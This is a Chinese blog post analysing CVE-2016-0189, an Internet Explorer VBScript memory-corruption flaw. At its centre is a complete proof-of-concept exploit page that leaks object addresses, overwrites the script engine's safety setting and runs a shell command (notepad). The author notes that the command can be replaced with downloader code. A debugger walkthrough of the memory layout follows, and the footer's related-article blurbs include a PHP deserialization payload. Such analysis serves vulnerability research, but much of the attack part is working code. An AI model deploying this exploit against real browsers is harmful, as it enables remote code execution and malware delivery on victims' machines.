CVE-2016-0189

最新推荐文章于 2024-05-03 08:26:38 发布
最新推荐文章于 2024-05-03 08:26:38 发布
阅读量664 收藏 1
点赞数
分类专栏: 工作趣文
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37353105/article/details/107779252
版权

IE CVE-2016-0189远程执行漏洞分析

作者: 被遗弃的庸才

一、前言

IE CVE-2016-0189是通过Microsoft发布的MS16-051的补丁程序进行对比之后发现的,随后漏洞被韩国用于APT攻击。出现漏洞的原因是在vbs解析引擎中,数组中指定下标时会调用vbscript!AccessArray中的vbscript!rtVariantChangeTypeEx函数,vbscript!rtVariantChangeTypeEx函数并没有实现而是调用了oleaut32!VariantChangeTypeEx函数,在这个函数中会检查传入的索引类型,如果不是整数型就会调用valueof方法,进行类型转化,注意这里的valeueof是可以被重载的(这里就可以做一些猥琐的事情)。如果我们在重载的valueof函数中减小数组的大小,内存就会被释放,这时立刻申请内存,数组被释放的部分就可能被再次占用(但是数组的访问还是原始的大小,我们就可以构造任意地址的读写)。这里是先定义一个比较大的二维数组A(1, 2000),接着给A(arg1, 2)赋值,首先会去调用重载的valueof函数,函数中会修改A数组的大小,接着就立刻申请内存进行占位,最后返回1。对aw.A(arg1, 2)赋值就会变成对aw.A(1, 2)赋值,而且A数组的A(1,1)之后的内存已经被释放又被构造的内存重新占用了。

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

二、漏洞复现

<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=10">
</head>
<body>
    <script type="text/vbscript">
        Dim aw
        Dim plunge(32)
        Dim y(32)
        prefix = "%u4141%u4141"
        d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
        b = String(64000, "D")
        c = d & b
        x = UnEscape(c)

        Class ArrayWrapper
            Dim A()
            Private Sub Class_Initialize
                ' 2x2000 elements x 16 bytes / element = 64000 bytes
                ReDim Preserve A(1, 2000)
            End Sub

            Public Sub Resize()
                ReDim Preserve A(1, 1)
            End Sub
        End Class

        Class Dummy
        End Class

        Function getAddr (arg1, s)
            aw = Null
            Set aw = New ArrayWrapper

            For i = 0 To 32
                Set plunge(i) = s
            Next

            Set aw.A(arg1, 2) = s

            Dim addr
            Dim i
            For i = 0 To 31
                If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
                    addr = strToInt(Mid(y(i), 3 + 4, 2))
                End If
                y(i) = Null
            Next

            If addr = Null Then
                document.location.href = document.location.href
                Return
            End If

            getAddr = addr
        End Function

        Function leakMem (arg1, addr)
            d = prefix & "%u0008%u4141%u4141%u4141"
            c = d & intToStr(addr) & b
            x = UnEscape(c)

            aw = Null
            Set aw = New ArrayWrapper

            Dim o
            o = aw.A(arg1, 2)

            leakMem = o
        End Function

        Sub overwrite (arg1, addr)
            d = prefix & "%u400C%u0000%u0000%u0000"
            c = d & intToStr(addr) & b
            x = UnEscape(c)

            aw = Null
            Set aw = New ArrayWrapper

            ' Single has vartype of 0x04
            aw.A(arg1, 2) = CSng(0)
        End Sub

        Function exploit (arg1)
            Dim addr
            Dim csession
            Dim olescript
            Dim mem

            ' Create a vbscript class instance
            Set dm = New Dummy
            ' Get address of the class instance
            addr = getAddr(arg1, dm)
            ' Leak CSession address from class instance
            mem = leakMem(arg1, addr + 8)
            csession = strToInt(Mid(mem, 3, 2))
            ' Leak COleScript address from CSession instance
            mem = leakMem(arg1, csession + 4)
            olescript = strToInt(Mid(mem, 1, 2))
            ' Overwrite SafetyOption in COleScript (e.g. god mode)
            ' e.g. changes it to 0x04 which is not in 0x0B mask
            overwrite arg1, olescript + &H174
			set obj = createobject("wscript.shell")
			obj.run("notepad")
        End Function

        Function triggerBug
            ' Resize array we are currently indexing
            aw.Resize()

            ' Overlap freed array area with our exploit string
            Dim i
            For i = 0 To 32
                ' 24000x2 + 6 = 48006 bytes
                y(i) = Mid(x, 1, 24000)
            Next
        End Function
    </script>

    <script type="text/javascript">
        function strToInt(s)
        {
            return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
        }
        function intToStr(x)
        {
            return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
        }
        var o;
        o = {"valueOf": function () {
                triggerBug();
                return 1;
            }};
        setTimeout(function() {exploit(o);}, 50);
    </script>
</body>
</html>

在本地虚拟机上面就成功执行poc了
在这里插入图片描述

三、漏洞分析

看一看会用到的结构体,虽然看起来很长但是只有0x10个字节,这里是各个类型的定义https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-oaut/3fe7db9f-5803-4dc4-9d14-5425d3f5461f。

typedef struct tagVARIANT {
  union {
    struct {
      VARTYPE vt;
      WORD    wReserved1;
      WORD    wReserved2;
      WORD    wReserved3;
      union {
        LONGLONG     llVal;
        LONG         lVal;
        BYTE         bVal;
        SHORT        iVal;
        FLOAT        fltVal;
        DOUBLE       dblVal;
        VARIANT_BOOL boolVal;
        VARIANT_BOOL __OBSOLETE__VARIANT_BOOL;
        SCODE        scode;
        CY           cyVal;
        DATE         date;
        BSTR         bstrVal;
        IUnknown     *punkVal;
        IDispatch    *pdispVal;
        SAFEARRAY    *parray;
        BYTE         *pbVal;
        SHORT        *piVal;
        LONG         *plVal;
        LONGLONG     *pllVal;
        FLOAT        *pfltVal;
        DOUBLE       *pdblVal;
        VARIANT_BOOL *pboolVal;
        VARIANT_BOOL *__OBSOLETE__VARIANT_PBOOL;
        SCODE        *pscode;
        CY           *pcyVal;
        DATE         *pdate;
        BSTR         *pbstrVal;
        IUnknown     **ppunkVal;
        IDispatch    **ppdispVal;
        SAFEARRAY    **pparray;
        VARIANT      *pvarVal;
        PVOID        byref;
        CHAR         cVal;
        USHORT       uiVal;
        ULONG        ulVal;
        ULONGLONG    ullVal;
        INT          intVal;
        UINT         uintVal;
        DECIMAL      *pdecVal;
        CHAR         *pcVal;
        USHORT       *puiVal;
        ULONG        *pulVal;
        ULONGLONG    *pullVal;
        INT          *pintVal;
        UINT         *puintVal;
        struct {
          PVOID       pvRecord;
          IRecordInfo *pRecInfo;
        } __VARIANT_NAME_4;
      } __VARIANT_NAME_3;
    } __VARIANT_NAME_2;
    DECIMAL decVal;
  } __VARIANT_NAME_1;
} VARIANT;

这里首先分析一下获取地址,这里的s代表的是Dummy类,其中这个类是空的没有具体实现的函数。plunge(i)是用来占用一些空隙内存的,这里在调用A(arg1, 2)时会触发valueOf,会释放内存后申请内存,其中x是精心构造的,为了得到类对象的地址,x前面的0x41是为了方便找到这个块内存。查找的方式是判断存储在A(1,2)的对象的,是否在申请的内存内,从而出现错位和2014-6332的错位几乎是一样的,可以看下图的windbg的内存布局。

prefix = "%u4141%u4141"
d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
b = String(64000, "D")
c = d & b
x = UnEscape(c)

Function triggerBug
    ' Resize array we are currently indexing
    aw.Resize()

    ' Overlap freed array area with our exploit string
    Dim i
    For i = 0 To 32
        ' 24000x2 + 6 = 48006 bytes
        y(i) = Mid(x, 1, 24000)
    Next
End Function
o = {"valueOf": function () {
    triggerBug();
    return 1;
    }};
    
    Set dm = New Dummy
    ' Get address of the class instance
    addr = getAddr(arg1, dm)    
...............
Function getAddr (arg1, s)
    aw = Null
    Set aw = New ArrayWrapper

    For i = 0 To 32
        Set plunge(i) = s
    Next

    Set aw.A(arg1, 2) = s

    Dim addr
    Dim i
    For i = 0 To 31
        If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
            addr = strToInt(Mid(y(i), 3 + 4, 2))
        End If
        y(i) = Null
    Next

    If addr = Null Then
        document.location.href = document.location.href
        Return
    End If

    getAddr = addr
End Function

我们想要的是下面的这种情况,A和f(x)是相邻的。

在这里插入图片描述

这里下断点的方式bp vbscript!VbsIsEmpty,这里在addr = strToInt(Mid(y(i), 3 + 4, 2))后面加上IsEmpty(f(i))就能看到如下的内存布局

在这里插入图片描述

好了现在找到我们需要的内存结构和类对象的地址接下来就是得到CSession对象的地址,这里的构造了一个0x8的数据类型也就是BSTR(string),同时可以从上图看出该结构为4字节的字符串长度+字符+两个字节的00(上图看不见,用来标记结尾的)。

在这里插入图片描述

之后利用同样的方式构造出字符串的的数据类型,这里用一个问题就是为什么要+8在strToInt(Mid(mem, 3, 2)),既然csession对象在0xc的位置直接leakMem(arg1, addr + c)在csession = strToInt(Mid(mem, 1, 2))不是一样的吗?我们从内存的角度来看一看为什么不行。

mem = leakMem(arg1, addr + 8)
csession = strToInt(Mid(mem, 3, 2))
csession = strToInt(Mid(mem, 3, 2))
mem = leakMem(arg1, csession + 4)
olescript = strToInt(Mid(mem, 1, 2))
Function leakMem (arg1, addr)
    d = prefix & "%u0008%u4141%u4141%u4141"
    c = d & intToStr(addr) & b
    x = UnEscape(c)

    aw = Null
    Set aw = New ArrayWrapper

    Dim o
    o = aw.A(arg1, 2)

    leakMem = o
End Function

老规矩可以在o = aw.A(arg1, 2)后面加上一个IsEmpty(y(0))并下断,断下之后可以看到下面的内存

在这里插入图片描述

最后就是构造写,可以从代码中看出把类型构造为0x400c之后给olescript对象加上0x174的赋值为0,那么我们还是一样添加IsEmpty(y(0))之后下断,但是会有一个问题就是拿到的是f(0)并不是我们想要的,主要原因是f(0)在内存中不是和A数组紧挨,所以我们这里添加一些代码来确认这里的A和f(0)是相邻的。

overwrite arg1, olescript + &H174
Sub overwrite (arg1, addr)
     d = prefix & "%u400C%u0000%u0000%u0000"
     c = d & intToStr(addr) & b
     x = UnEscape(c)

aw = Null
Set aw = New ArrayWrapper

' Single has vartype of 0x04
IsEmpty(y(0))
aw.A(arg1, 2) = CSng(0)
End Sub

我是添加的代码
Sub overwrite (arg1, addr)
    d = prefix & "%u400C%u0000%u0000%u0000"
    c = d & intToStr(addr) & b
    x = UnEscape(c)

    aw = Null
    Set aw = New ArrayWrapper


    aw.A(arg1, 2) = CSng(0)

    Dim i
    For i = 0 To 32
        If Asc(Mid(y(i), 3, 1)) <> &h8 Then
            IsEmpty(y(i))
        End If
    Next


End Sub

这里可以看到将目标地址修改为4关闭了safemode,开启上帝模式,之后添加一些vb代码打开notepad,当然这vb代码可以换成其他downloader的代码。

在这里插入图片描述

aw = Null
Set aw = New ArrayWrapper


aw.A(arg1, 2) = CSng(0)

Dim i
For i = 0 To 32
    If Asc(Mid(y(i), 3, 1)) <> &h8 Then
        IsEmpty(y(i))
    End If
Next
End Sub

这里可以看到将目标地址修改为4关闭了safemode,开启上帝模式,之后添加一些vb代码打开notepad,当然这vb代码可以换成其他downloader的代码。
在这里插入图片描述

被遗弃的庸才
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2016-3720
02-22
这个项目是CVE-2016-3720 Demo,为了避免搭建环境,大佬们可以直接获取到这个资源。 相对应的分析文章是:https://blog.csdn.net/qq_36869808 可以在这篇文章看到分析的内容,感谢~当然如果非常需要这个资源,也...
利用Powershell Empire和CVE-2016-0189攻击用户的IE浏览器
moonhillcity的博客
10-21 2793
前言 Empire(http://www.powershellempire.com/)是一个PowerShell后期漏洞利用代理工具,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能,它可以快速部署后期漏洞利用模块,并且能够躲避网络检测。 因此,Powershell Empire是我们最喜欢的一款工具,尤
安全合规之CVE-2016-2183
最新发布
dzqxwzoe的博客
05-03 1274
安全部门脆弱性扫描到如下的风险漏洞要求系统上线必须要修复完毕。不过我仔细的看了安全部门返回的报告,它是针对Windows Server2019远程桌面端口进行风险报告…这是刷存在感了吗?哎,没有办法先做调查确认,然后再去考虑修复。此远程桌面是不对外发布的,但也需要针对此问题进行修复…才叫折磨人…
SSL/TLS协议信息泄露漏洞(CVE-2016-2183)
热门推荐
qq_42947816的博客
02-08 2万+
法国国家信息与自动化研究所(French Institute for Research in Computer Science and Automation,INRIA)的两名科学家发布了一项新研究,这是一种针对64位分组密码算法的生日攻击,其详细阐述了一种攻击手法—从用64位密码加密的TLS(HTTPS)流量恢复数据。
CVE-2016-1000027分析
GalaxySpaceX的博客
04-10 1万+
CVE-2016-1000027 漏洞原理和修复方法
CVE-2016-2183漏洞修复
w184414332的博客
08-18 1万+
CVE-2016-2183漏洞修复
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
cve-2016-0189, 在 IE11 ) 中,CVE 2016 ( VBScript内存损坏)的概念漏洞的验证.zip
09-17
cve-2016-0189, 在 IE11 ) 中,CVE 2016 ( VBScript内存损坏)的概念漏洞的验证 CVE-2016-0189Proof-of-Concept利用 CVE-2016-0189 ( IE11中的VBScript内存损坏)在 Windows 10 IE11上测试。写...
DirtyCow提权漏洞复现(CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
【网络安全】从 CVE-2016-0165 漏洞说起:分析、利用和检测(上)
A_991128a的博客
01-16 221
CVE-2016-0165 是一个典型的整数上溢漏洞,由于在win32k!函数中分配内核池内存块前没有对计算的内存块大小参数进行溢出校验,导致函数有分配到远小于所期望大小的内存块的可能性。而函数本身并未对分配的内存块大小进行必要的校验,在后续通过该内存块作为缓冲区存储数据时,将会触发缓冲区溢出访问的 OOB 问题,严重情况将导致系统 BSOD 的发生。本分析中利用该特性,通过内核内存布局的设计以及内核对象的构造,使win32k!
SSL/TLS协议信息泄露漏洞(CVE-2016-2183)、SSL/TLS RC4 信息泄露漏洞(CVE-2013-2566)修复方法
kang0x0的博客
03-10 2万+
SSL/TLS协议信息泄露漏洞(CVE-2016-2183) SSL/TLS RC4 信息泄露漏洞(CVE-2013-2566) SSL/TLS 受诫礼(BAR-MITZVAH)攻击漏洞(CVE-2015-2808) 修复方法 一、漏洞说明: 通过绿盟漏洞检测工具扫描发现Windows系统存在SSL/TLS协议信息泄露漏洞(CVE-2016-2183)、SSL/TLS RC4 信息泄露漏洞(CVE-2013-2566)、SSL/TLS 受诫礼(BAR-MITZVAH)攻击漏洞(CVE-2015-2808)。
POWERSHELL EMPIRE + CVE-2016-0189 = PROFIT
Z3r0yu
01-02 438
Powershell Empire 是我们在渗透目标用户时一直都很喜欢的工具之一,虽然我们通常都是用Metaspolit和Empire来一起完成工作,使浏览器漏洞和经验结合在Empire中。 在最近的一次测试中我们没有选择去使用MSF,相反我们和一个新的“经验丰富”的Empire一起利用CVE-2016-0189(也就是vbscrupt_godmode)其攻击使用IE9—11的用户。Empire
CVE-2016-0165 分析&利用POC
qq_41252520的博客
07-08 561
1.3.危害等级 7.8 | 高危这是未打补丁和打过补丁之后的RGNMEMOBJ::vCreate\textcolor{orange}{RGNMEMOBJ::vCreate}RGNMEMOBJ::vCreate函数对比图有点像找不同 ,发现主要有6处不同。这是在分配缓冲区之前增加的两个函数看到ULongAdd\textcolor{cornflowerblue}{ULongAdd}ULongAdd和ULongLongToULong\textcolor{cornflowerblue}{ULongLongToUL
Linux Redhat 服务器 OpenSSH 漏洞修复 or 升级 OpenSSH 8.8
.
06-30 8094
【详解--分析--实操 | Linux Redhat OpenSSH 漏洞修复 or 升级 OpenSSH 8.8
Imagetragick 命令执行漏洞(CVE-2016–3714)
weixin_30376453的博客
07-25 368
Imagetragick介绍: ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。但近来有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。 命令执行漏洞是出在 ImageMagick 对 https 形式的文件处理的过程中。 ImageMagick 之所以支...
每日一PATCH——CVE-2016-7913
Scarlett_geng的博客
01-15 446
每日一PATCH——CVE-2016-7913漏洞链接patch链接漏洞分析漏洞描述patchpatch方法 漏洞链接 https://nvd.nist.gov/vuln/detail/CVE-2016-7913 patch链接 https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8dfbcc4...
CVE-2016-7249
01-20
CVE-2016-7249是一个PHP反序列化漏洞。该漏洞存在于PHP的unserialize()函数中,攻击者可以通过构造恶意的序列化数据来执行任意代码。这个漏洞的利用方式与CVE-2016-7124类似,都是通过利用PHP的魔术方法来执行恶意代码。 下面是一个简单的演示代码,用于说明CVE-2016-7249漏洞的利用过程: ```php <?php class Example { public $data; public function __destruct() { eval($this->data); } } $payload = 'O:7:"Example":1:{s:4:"data";s:10:"phpinfo();";}'; // 恶意的序列化数据 $obj = unserialize($payload); // 反序列化 ?> ``` 在上面的代码中,我们构造了一个名为Example的类,其中包含一个名为data的属性。在Example类的__destruct()方法中,我们使用eval()函数执行了$data变量中的代码。在反序列化时,我们传入了一个恶意的序列化数据,其中data属性被设置为"phpinfo();",这将导致执行phpinfo()函数。 需要注意的是,CVE-2016-7249是一个已经被修复的漏洞,因此在最新版本的PHP中已经不存在这个漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值